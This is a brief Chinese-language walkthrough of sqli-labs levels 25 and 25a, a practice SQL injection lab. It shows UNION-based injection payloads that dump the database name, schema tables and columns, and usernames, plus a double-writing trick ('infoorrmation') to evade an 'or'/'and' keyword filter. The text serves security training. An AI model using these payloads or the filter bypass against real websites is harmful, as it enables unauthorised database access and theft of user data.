less-25 单引号 GET型
一道水题,就是让我们感受一下过滤,只是过滤了or和and。
就是用很基础的union 查询就可以了。但是注意一下,在写information的时候,它会把“or“给过滤掉,但是我们可以使用双写绕过。
数据库:
-1’ union select 1,2,database() %23
表和字段:
-1’ union select 1,group_concat(table_name),group_concat(column_name) from infoorrmation_schema.columns where table_schema=database()%23
数据:
-1’ union select 1,2,group_concat(username) from users%23
less-25a 数字型 GET
这个和25一模一样,就是变成了数字型的,把单引号去掉就可以了。